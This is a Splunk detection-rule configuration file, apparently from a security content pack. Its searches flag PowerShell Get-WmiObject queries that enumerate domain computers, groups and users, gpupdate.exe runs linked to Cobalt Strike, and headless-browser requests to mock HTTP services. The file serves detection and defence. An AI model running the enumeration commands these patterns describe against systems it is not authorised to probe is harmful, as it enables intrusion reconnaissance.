action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 70, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to discover remote systems. The `Get-WmiObject` commandlet combined with the `DS_Computer` parameter can be used to return a list of all domain computers. Red Teams and adversaries alike may leverage WMI in this case, using PowerShell, to enumerate domain groups for situational awareness and Active Directory Discovery.
action.notable.param.rule_title = GetWmiObject Ds Computer with PowerShell
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process=*Get-WmiObject* AND Processes.process="*namespace root\\directory\\ldap*" AND Processes.process="*class ds_computer*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getwmiobject_ds_computer_with_powershell_filter`

[ESCU - GetWmiObject Ds Computer with PowerShell Script Block - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet. The `DS_Computer` class parameter leverages WMI to query for all domain computers. Red Teams and adversaries may leverage this commandlet to enumerate domain computers for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet. The `DS_Computer` class parameter leverages WMI to query for all domain computers. Red Teams and adversaries may leverage this commandlet to enumerate domain computers for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting.
action.escu.creation_date = 2022-05-02
action.escu.modification_date = 2022-05-02
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetWmiObject Ds Computer with PowerShell Script Block - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Discovery"]
action.risk = 1
action.risk.param._risk_message = Remote system discovery enumeration on $Computer$ by $UserID$
action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 15}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetWmiObject Ds Computer with PowerShell Script Block - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet. The `DS_Computer` class parameter leverages WMI to query for all domain computers. Red Teams and adversaries may leverage this commandlet to enumerate domain computers for situational awareness and Active Directory Discovery.
action.notable.param.rule_title = GetWmiObject Ds Computer with PowerShell Script Block
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 (ScriptBlockText=*Get-WmiObject* AND ScriptBlockText="*namespace root\\directory\\ldap*" AND ScriptBlockText="*class ds_computer*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `getwmiobject_ds_computer_with_powershell_script_block_filter`

[ESCU - GetWmiObject Ds Group with PowerShell - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for domain groups. The `Get-WmiObject` commandlet combined with the `-class ds_group` parameter can be used to return the full list of groups in a Windows domain. Red Teams and adversaries alike may leverage WMI in this case, using PowerShell, to enumerate domain groups for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for domain groups. The `Get-WmiObject` commandlet combined with the `-class ds_group` parameter can be used to return the full list of groups in a Windows domain. Red Teams and adversaries alike may leverage WMI in this case, using PowerShell, to enumerate domain groups for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2021-08-25
action.escu.modification_date = 2021-08-25
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetWmiObject Ds Group with PowerShell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery"]
action.risk = 1
action.risk.param._risk_message = Domain group discovery enumeration on $dest$ by $user$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetWmiObject Ds Group with PowerShell - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for domain groups. The `Get-WmiObject` commandlet combined with the `-class ds_group` parameter can be used to return the full list of groups in a Windows domain. Red Teams and adversaries alike may leverage WMI in this case, using PowerShell, to enumerate domain groups for situational awareness and Active Directory Discovery.
action.notable.param.rule_title = GetWmiObject Ds Group with PowerShell
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process=*Get-WmiObject* AND Processes.process="*namespace root\\directory\\ldap*" AND Processes.process="*class ds_group*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getwmiobject_ds_group_with_powershell_filter`

[ESCU - GetWmiObject Ds Group with PowerShell Script Block - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet used with specific parameters. The `DS_Group` parameter leverages WMI to query for all domain groups. Red Teams and adversaries may leverage this commandlet to enumerate domain groups for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet used with specific parameters. The `DS_Group` parameter leverages WMI to query for all domain groups. Red Teams and adversaries may leverage this commandlet to enumerate domain groups for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting.
action.escu.creation_date = 2022-05-02
action.escu.modification_date = 2022-05-02
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetWmiObject Ds Group with PowerShell Script Block - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Discovery"]
action.risk = 1
action.risk.param._risk_message = Domain group discovery enumeration using PowerShell on $dest$ by $user$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetWmiObject Ds Group with PowerShell Script Block - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet used with specific parameters. The `DS_Group` parameter leverages WMI to query for all domain groups. Red Teams and adversaries may leverage this commandlet to enumerate domain groups for situational awareness and Active Directory Discovery.
action.notable.param.rule_title = GetWmiObject Ds Group with PowerShell Script Block
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 (ScriptBlockText=*Get-WmiObject* AND ScriptBlockText="*namespace root\\directory\\ldap*" AND ScriptBlockText="*class ds_group*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getwmiobject_ds_group_with_powershell_script_block_filter`

[ESCU - GetWmiObject DS User with PowerShell - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for domain users. The `Get-WmiObject` commandlet combined with the `-class ds_user` parameter can be used to return the full list of users in a Windows domain. Red Teams and adversaries alike may leverage WMI in this case, using PowerShell, to enumerate domain users for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for domain users. The `Get-WmiObject` commandlet combined with the `-class ds_user` parameter can be used to return the full list of users in a Windows domain. Red Teams and adversaries alike may leverage WMI in this case, using PowerShell, to enumerate domain users for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2021-08-24
action.escu.modification_date = 2021-08-24
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetWmiObject DS User with PowerShell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery"]
action.risk = 1
action.risk.param._risk_message = an instance of process $process_name$ with commandline $process$ in $dest$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetWmiObject DS User with PowerShell - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for domain users. The `Get-WmiObject` commandlet combined with the `-class ds_user` parameter can be used to return the full list of users in a Windows domain. Red Teams and adversaries alike may leverage WMI in this case, using PowerShell, to enumerate domain users for situational awareness and Active Directory Discovery.
action.notable.param.rule_title = GetWmiObject DS User with PowerShell
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe" OR Processes.process_name="powershell*") AND Processes.process = "*get-wmiobject*" AND Processes.process = "*ds_user*" AND Processes.process = "*root\\directory\\ldap*" AND Processes.process = "*-namespace*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getwmiobject_ds_user_with_powershell_filter`

[ESCU - GetWmiObject DS User with PowerShell Script Block - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet. The `DS_User` class parameter leverages WMI to query for all domain users. Red Teams and adversaries may leverage this commandlet to enumerate domain users for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet. The `DS_User` class parameter leverages WMI to query for all domain users. Red Teams and adversaries may leverage this commandlet to enumerate domain users for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The following Hunting analytic requires PowerShell operational logs to be imported. Modify the powershell macro as needed to match the sourcetype or add index. This analytic is specific to 4104, or PowerShell Script Block Logging.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2023-11-07
action.escu.modification_date = 2023-11-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetWmiObject DS User with PowerShell Script Block - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Discovery"]
action.risk = 1
action.risk.param._risk_message = powershell process having commandline for user enumeration detected on host - $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetWmiObject DS User with PowerShell Script Block - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet. The `DS_User` class parameter leverages WMI to query for all domain users. Red Teams and adversaries may leverage this commandlet to enumerate domain users for situational awareness and Active Directory Discovery.
action.notable.param.rule_title = GetWmiObject DS User with PowerShell Script Block
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText = "*get-wmiobject*" ScriptBlockText = "*ds_user*" ScriptBlockText = "*-namespace*" ScriptBlockText = "*root\\directory\\ldap*" | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getwmiobject_ds_user_with_powershell_script_block_filter`

[ESCU - GetWmiObject User Account with PowerShell - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query local users. The `Get-WmiObject` commandlet combined with the `Win32_UserAccount` parameter is used to return a list of all local users. Red Teams and adversaries may leverage this commandlet to enumerate users for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.001"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query local users. The `Get-WmiObject` commandlet combined with the `Win32_UserAccount` parameter is used to return a list of all local users. Red Teams and adversaries may leverage this commandlet to enumerate users for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting.
action.escu.creation_date = 2023-04-05
action.escu.modification_date = 2023-04-05
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetWmiObject User Account with PowerShell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Winter Vivern", "Active Directory Discovery"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetWmiObject User Account with PowerShell - Rule
action.correlationsearch.annotations = {"analytic_story": ["Winter Vivern", "Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.001"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process=*Get-WmiObject* AND Processes.process=*Win32_UserAccount*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getwmiobject_user_account_with_powershell_filter`

[ESCU - GetWmiObject User Account with PowerShell Script Block - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet used with specific parameters. The `Win32_UserAccount` parameter is used to return a list of all local users. Red Teams and adversaries may leverage this commandlet to enumerate users for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1087", "T1087.001", "T1059.001"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet used with specific parameters. The `Win32_UserAccount` parameter is used to return a list of all local users. Red Teams and adversaries may leverage this commandlet to enumerate users for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting.
action.escu.creation_date = 2023-04-05
action.escu.modification_date = 2023-04-05
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetWmiObject User Account with PowerShell Script Block - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Winter Vivern", "Active Directory Discovery", "Malicious PowerShell"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetWmiObject User Account with PowerShell Script Block - Rule
action.correlationsearch.annotations = {"analytic_story": ["Winter Vivern", "Active Directory Discovery", "Malicious PowerShell"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1087", "T1087.001", "T1059.001"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 (ScriptBlockText="*Get-WmiObject*" AND ScriptBlockText="*Win32_UserAccount*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | `security_content_ctime(firstTime)` | `getwmiobject_user_account_with_powershell_script_block_filter`

[ESCU - GPUpdate with no Command Line Arguments with Network - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies gpupdate.exe with no command line arguments and with a network connection. It is unusual for gpupdate.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. gpupdate.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint", "Network_Traffic"]
action.escu.eli5 = The following analytic identifies gpupdate.exe with no command line arguments and with a network connection. It is unusual for gpupdate.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. gpupdate.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Limited false positives may be present in small environments. Tuning may be required based on parent process.
action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - GPUpdate with no Command Line Arguments with Network - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"] action.risk = 1 action.risk.param._risk_message = Process gpupdate.exe with parent_process $parent_process_name$ is executed on $dest$ by user $user$, followed by an outbound network connection to $C2$ on port $dest_port$. This behaviour is seen with cobaltstrike. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}, {"threat_object_field": "parent_process_name", "threat_object_type": "process"}, {"threat_object_field": "C2", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GPUpdate with no Command Line Arguments with Network - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies gpupdate.exe with no command line arguments and with a network connection. 
It is unusual for gpupdate.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. gpupdate.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.notable.param.rule_title = GPUpdate with no Command Line Arguments with Network action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=gpupdate.exe by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(?i)(gpupdate\.exe.{0,4}$)"| join process_id [| tstats `security_content_summariesonly` count FROM datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port != 0 by All_Traffic.process_id All_Traffic.dest All_Traffic.dest_port | `drop_dm_object_name(All_Traffic)` | rename dest as C2 ] | table _time user dest parent_process_name process_name process_path process process_id dest_port C2 | `gpupdate_with_no_command_line_arguments_with_network_filter` [ESCU - Headless Browser Mockbin or Mocky Request - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies headless browser activity accessing mockbin.org or mocky.io. Mockbin.org and mocky.io are web services that allow users to mock HTTP requests and responses. 
The detection is based on the presence of "--headless" and "--disable-gpu" command line arguments which are commonly used in headless browsing and the presence of mockbin.org or mocky.io in the process. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies headless browser activity accessing mockbin.org or mocky.io. Mockbin.org and mocky.io are web services that allow users to mock HTTP requests and responses. The detection is based on the presence of "--headless" and "--disable-gpu" command line arguments which are commonly used in headless browsing and the presence of mockbin.org or mocky.io in the process. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node. In addition, confirm the latest CIM App 4.20 or higher is installed and the latest TA for the endpoint product. action.escu.known_false_positives = False positives are not expected with this detection, unless within the organization there is a legitimate need for headless browsing accessing mockbin.org or mocky.io. 
